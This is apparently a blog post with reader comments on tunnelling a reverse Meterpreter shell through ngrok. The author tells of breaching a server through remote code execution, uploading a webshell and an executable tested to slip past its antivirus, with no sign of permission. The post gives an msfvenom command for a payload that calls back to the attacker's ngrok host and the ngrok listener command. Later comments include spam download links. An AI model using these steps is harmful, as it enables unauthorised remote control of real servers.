If using metasploit locally on the system, I can't always set up a reverse connection over NAT.
Now here's the Current Situation!
- I found a server vulnerable to Remote RCE.
- Uploaded a webshell to gather some info.
- Uploaded an exe after carefully testing it against the AV installed over the server.
- Booted up metasploit.
- Tried to exploit it to get a bind shell but unforunately bind shell is not working (Firewall as always).
- Let's do a Reverse then ;)
- But there's another problem :(
- I'm Sitting in office and sadly I don't have Router login credentials for setting up port forwarding :(
Now what to do?
Here comes Ngrok to the rescue. :D
What's Ngrok?
"secure introspected tunnels to localhost" & "Expose local servers behind NATs and firewalls to the public internet over secure tunnels." - direct from their website
Setting up Ngrok
1. Register to ngrok. (It doesn't verify the email id though)
2. once you're logged in, just follow the instruction. you'll get a screen like this.
3. Once the setup is done, run the following command to run ngrok to listen for tcp connect on a random port and forward it to our system over NAT.
./ngrok tcp 80
4. generating meterpreter exe with ngrok settings and setup a handler to accept reverse meterpreter connection.
msfvenom -p windows/meterpreter/reverse_tcp_dns lport=12791 lhost=<ngrok domain> -f exe -o test.exe
The above command will generate a simple exe with meterpreter stub. NOTE, I'm NOT sharing the techniques for bypassing AVs. Also, please do not upload your exe to any online scanner (if custom made), that's a very stupid thing to do. Better use vt-notify by @Mubix. A great tool!
5. Now execute the exe and you'll see the words that'll make you go crazy - "Sending Stage bytes" ;)
Now where did "127.0.0.1" came from? o_O
Ngrok is forwarding the connection to our local system so obviously, it will show "127.0.0.1" to us. When the handler receives the stager and starts sending the stage to the server, it goes through our localhost's forwarded port.
Ngrok Dashboard can help you see the number of connections you're having.
6. A drawback with this method, you can't get multiple meterpreter sessions over a single port. for multiple sessions, you have to follow all the steps all over again with a different port.
I Hope this helps.
Thanks & Cheers!!
Wonderful work, thats new and it worked. Thanks for sharing!!
ReplyDeletewill this work with android_meterpreter_tcp??
ReplyDeleteYES sure it will and i am even working no something like "how to use fix url on the ngrok"
ReplyDeleteI'm having a problem with this.. I am able to receive target's action (which is running the payload) then after connecting to open session created by the target, I can't execute meterpreter commands. :/
ReplyDeletehello,
ReplyDeletei was playing around with ngrok and metasploit and my virtual machines
i have a problem with the reverse tcp exploit
it doesn't gives the meterpreter payload..
[-] Handler failed to bind to ip of ngrok ip :4444:-
[] Started reverse TCP handler on 0.0.0.0:4444
[-] Exploit aborted due to failure: unknown: remote ip :8080 - Error retrieving table prefix
[] Exploit completed, but no session was created.
it worth ngrok for this purpose ?
what should i do ?
thank you
but what if havent had any control over the target? (
ReplyDeleteAbyss Zircanavo: Meterpreter Over Ngrok >>>>> Download Now
ReplyDelete>>>>> Download Full
Abyss Zircanavo: Meterpreter Over Ngrok >>>>> Download LINK
>>>>> Download Now
Abyss Zircanavo: Meterpreter Over Ngrok >>>>> Download Full
>>>>> Download LINK